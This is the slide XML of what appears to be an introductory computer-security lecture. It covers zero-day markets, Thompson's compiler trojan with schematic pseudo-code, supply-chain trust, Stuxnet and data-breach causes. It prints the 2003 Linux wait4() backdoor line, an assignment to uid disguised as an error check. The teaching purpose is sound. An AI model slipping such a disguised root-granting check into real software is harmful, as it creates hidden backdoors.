            <a:ext cx="1422400" cy="1074058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E87D5-E2C2-1849-B7C3-3730425E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73590"/>
            <a:ext cx="6057827" cy="4435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715ACF-FA22-404E-8182-CC765453B750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8176187" y="673590"/>
            <a:ext cx="777240" cy="126859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58FC1E-834C-1440-99A9-FB789B783568}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="4266862"/>
            <a:ext cx="1979122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36D710-EF2C-D943-BAE4-D87CDAF37DEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="3028950"/>
            <a:ext cx="312420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1AF87E-F863-D645-B1A8-B0D425F9436F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7557729" y="1888673"/>
            <a:ext cx="1431793" cy="66385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85E0661-0D7C-9248-B8A7-83A642442825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5813516" y="2186387"/>
            <a:ext cx="1706514" cy="775451"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1422400 w 1422400"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1074058"/>
              <a:gd name="connsiteX1" fmla="*/ 435428 w 1422400"/>
              <a:gd name="connsiteY1" fmla="*/ 377372 h 1074058"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1422400"/>
              <a:gd name="connsiteY2" fmla="*/ 1074058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074058">
                <a:moveTo>
                  <a:pt x="1422400" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1047447" y="99181"/>
                  <a:pt x="672495" y="198362"/>
                  <a:pt x="435428" y="377372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="198361" y="556382"/>
                  <a:pt x="99180" y="815220"/>
                  <a:pt x="0" y="1074058"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="5715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DFCD-99D9-ADB2-C807-F4D6E550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bounties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37EE7E-378D-E9AD-177A-F6488DA4BB4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="895350"/>
            <a:ext cx="7467600" cy="3491195"/>
            <a:chOff x="838200" y="1200150"/>
            <a:chExt cx="7467600" cy="34911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32B352-D3BD-AD39-F516-94B8C02DC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394"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="838200" y="1200150"/>
              <a:ext cx="7467600" cy="349119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C5DF8D-799B-A4EE-8B50-ED3C40F6A6AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1066800" y="3763910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0F74DD-03F9-BA6D-B578-955E98830DD7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1054509" y="4046590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341073-D9D0-91D8-02AC-C16425EBD50F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1054509" y="4324350"/>
              <a:ext cx="256499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2DA209-D4E2-5CF2-DBD8-07CC934D00A6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952750"/>
              <a:ext cx="1828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9EF052-CEF5-F03C-DA59-DF34A8D270E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="4866501"/>
            <a:ext cx="259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zerodium.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>temporary.html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372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EEC5-03D1-6545-9B40-068A474A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buy 0days?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6D9D7-3A98-4D47-BEA1-F2149039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16503"/>
            <a:ext cx="7086600" cy="3110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378E6-70A2-3B48-92B2-58D61230B029}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="4248150"/>
            <a:ext cx="247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https://zerodium.com/faq.html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012A57-82DD-E247-8A5B-53ADF46374C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="2227622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5A2373-ACE4-0340-BFFF-083E40205502}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="249555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7708F-7505-8945-A6B4-F26EECF42DA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3817990"/>
            <a:ext cx="17931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204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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ken Thompson’s clever Trojan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0648" y="1876724"/>
            <a:ext cx="6400800" cy="4473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(CACM Aug. 1984)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7DB4-EEAE-2441-A92C-7761D2A9BD88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3069473" y="1221581"/>
            <a:ext cx="284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Turing award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CC3D8-9FF6-CD43-A08D-1298C4848E83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744766" y="3409950"/>
            <a:ext cx="588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code can we trust?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Kenneth L. Thompson | IEEE Computer Society">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB8D775E-E822-4644-B325-21A07D4F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78" y="1046064"/>
            <a:ext cx="1374972" cy="13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9D1A-D267-7349-A5D8-BE721624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code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1104-D745-4848-94F5-54370B4F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trust the “login” program in a Linux distribution?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(e.g. Ubuntu)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1776"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No!   the login program may have a backdoor </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="576"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	⇾  records my password as I type it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Solution:   recompile  login  program from source code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9525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can we trust the login source code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425">
              <a:spcBef>
                <a:spcPts val="1176"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No!    but we can inspect the code, then recompile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37424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FEE7-500C-1146-AE02-3A8F1C6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the compiler?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2CF0-66F1-F24B-BB19-DEC6C099D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No!     Example malicious compiler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FE83-1196-F545-8BCF-1C220CE58991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1962150"/>
            <a:ext cx="6186309" cy="2631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Monaco" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>	/*  regular compilation */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2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8793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B2FC-4065-0A44-B358-ABD290E6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8BCA-276C-1049-A171-D72D01D2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124200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:   	inspect compiler source code, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	then recompile the compiler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b="1" dirty="0"/>
              <a:t>Problem:  C compiler is itself written in C,   compiles itself</a:t>
            </a:r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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1366838" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if compiler binary has a backdoor?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B47E6-672C-D748-946E-358C9EAF1309}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2038350"/>
            <a:ext cx="822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4857750"/>
            <a:ext cx="602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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>www.cvedetails.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/top-50-products.php?year=2022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1D797-7F06-364F-B23F-8A652587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609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Top 10 products by total number of “distinct” vulnerabilities in 2022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C621A-66C7-D044-8764-98D636796AEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291281" y="3353414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B87678-AB83-C449-983F-2C27314A484F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291281" y="15811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7B6E29-7F47-4644-8F35-404E272466AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="30289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3D654E-3D87-EE43-A01A-F3799D35A101}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="44005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AA351-F650-9748-9648-BE5FA9FE703C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="401955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AA70CF2-A390-D26C-893B-C5C6924E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39" y="745658"/>
            <a:ext cx="7772400" cy="38072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937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Attack step 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:   change compiler source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41EF4-28A8-9448-9C77-C623FA2CFE7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1504950"/>
            <a:ext cx="5610831" cy="3616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compile(s) {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if (match(s, “login-program”))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compile(“login-backdoor”);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if (match(s, “compiler-program”)) {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compile(“compiler-backdoor”);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	return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  <a:latin typeface="Monaco" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>	}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Monaco" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>	/*  regular compilation */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="77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0BBB-1FA0-9F46-A953-DE36409CEB26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="1820232"/>
            <a:ext cx="4772631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627CB-C82D-3D49-95C4-72BD054CCFF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7391400" y="1820232"/>
            <a:ext cx="952142" cy="2590800"/>
            <a:chOff x="7391400" y="1657350"/>
            <a:chExt cx="952142" cy="2590800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581D2BC4-7DF2-3243-BAF3-B693FBD7F9E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7391400" y="1657350"/>
              <a:ext cx="304800" cy="2590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868B5-07E6-AB48-AF91-9DD04DE6F9D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7754919" y="2691140"/>
              <a:ext cx="588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(*)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1FE1-F209-5646-BB25-5A01727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Thompson’s clever backdoor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E2B-B419-814C-AE74-C13B6899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Attack step 2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Compile modified compiler   ⇒   compiler binary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1176"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Restore compiler source to original state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1176"/>
              </a:spcBef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Now:  inspecting compiler source reveals nothing unusual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… but compiling compiler gives a corrupt compiler binary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1176"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty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Complication:   compiler-backdoor needs to include all of (*)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3CD7C1-2522-E946-AEEA-ED0210F2EE26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="838200"/>
            <a:ext cx="8382000" cy="158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C8D9-17C0-F545-9111-0D35EBB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12A4-5F54-324C-9765-942DD5E9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order a laptop by mail.   When it arrives, what can I trust on it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1776"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications and/or operating system may be backdoored</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	⇒   solution:  reinstall  OS  and applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1776"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to reinstall?     Can’t trust OS to reinstall the OS.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	⇒   Boot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Tails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from a USB drive  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Debian)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1776"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to trust pre-boot BIOS, UEFI code.   Can we trust it?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	⇒   No!    (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ShadowHammer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> operation in 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1776"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can we trust the motherboard?     Software updates?  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35822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6371-CF6F-A24E-BDF0-649A242B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we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D7F32-FBF1-BF4F-8536-360549D9D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Sadly, nothing … anything can be compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>but then we can’t make progress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/>
              <a:t>Trusted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Computing Base  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(TCB) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assume some minimal part of the system is not compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then build a secure environment on top of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will see how during the course.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3427535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15D21-88D0-F042-B06A-02268DA6E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EC7B4D-3FF6-7C4D-92F1-86CACFE3C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26AD5-030A-0149-A216-2F27D7C81D3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="285750"/>
            <a:ext cx="602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Next lecture:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>control hijacking vulnerabilities  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3270758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compromise machines? </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>     4. Spread to isolated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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Stuxtnet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p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          Windows laptop infection   ⇒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    Siemens PCS 7 SCADA control software on Windows  ⇒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	Siemens device controller on isolated network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More on this later in course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038350"/>
            <a:ext cx="7924800" cy="1752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257550"/>
            <a:ext cx="8229600" cy="713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Insider attacks:  example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Hidden trap door in Linux  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 2003)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows attacker to take over a computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Practically undetectable change  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(uncovered via CVS logs)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Inserted line in wait4() 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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Looks like a standard error check, but …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-76200" y="3306253"/>
            <a:ext cx="91440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822325"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>if ((options == (__WCLONE|__WALL)) &amp;&amp; (current-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> = 0))                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="822325"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>retval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> = -EINVAL;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>      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8100" y="4857750"/>
            <a:ext cx="257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See: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>lwn.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/Articles/57135/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319582441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theft:  what is stolen  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(2012-2015)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086600" cy="33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04946"/>
            <a:ext cx="435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California breach notification report, 2015</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="910104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0389161-8528-154D-B6DD-B169EA339029}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="1435953"/>
            <a:ext cx="25863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Physical document </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>    loss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How companies lose customer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54773"/>
            <a:ext cx="2798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PrivacyRights.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>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278" y="3512937"/>
            <a:ext cx="362304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lost/stolen laptops or servers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24461"/>
            <a:ext cx="215815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malware/hacking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127" y="1998969"/>
            <a:ext cx="28076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Accidental disclosure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9057" y="4308625"/>
            <a:ext cx="35430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do we have this data?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60ADA0-1F04-8646-9256-03F875838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755867"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2946122" y="1352550"/>
          <a:ext cx="3988078" cy="281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AC58CFD4-30EB-9440-AE98-54C79F64DDC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2896517" y="899330"/>
            <a:ext cx="2843471" cy="595961"/>
            <a:chOff x="2896517" y="899330"/>
            <a:chExt cx="2843471" cy="595961"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2896517" y="899330"/>
              <a:ext cx="28434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insider misuse/attack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41CEA6-E497-3440-9E72-028F14609FA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644598" y="1276350"/>
              <a:ext cx="156002" cy="218941"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 156002"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 218941"/>
                <a:gd name="connsiteX1" fmla="*/ 154546 w 156002"/>
                <a:gd name="connsiteY1" fmla="*/ 115910 h 218941"/>
                <a:gd name="connsiteX2" fmla="*/ 64394 w 156002"/>
                <a:gd name="connsiteY2" fmla="*/ 218941 h 2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002" h="218941">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="71907" y="39710"/>
                    <a:pt x="143814" y="79420"/>
                    <a:pt x="154546" y="115910"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165278" y="152400"/>
                    <a:pt x="114836" y="185670"/>
                    <a:pt x="64394" y="218941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772400" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Why compromise web sites:   (3) infect users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8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534400" cy="4019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err="1"/>
              <a:t>Mpack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  PHP-based tools installed on compromised web sites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Embedded as an </a:t>
            </a:r>
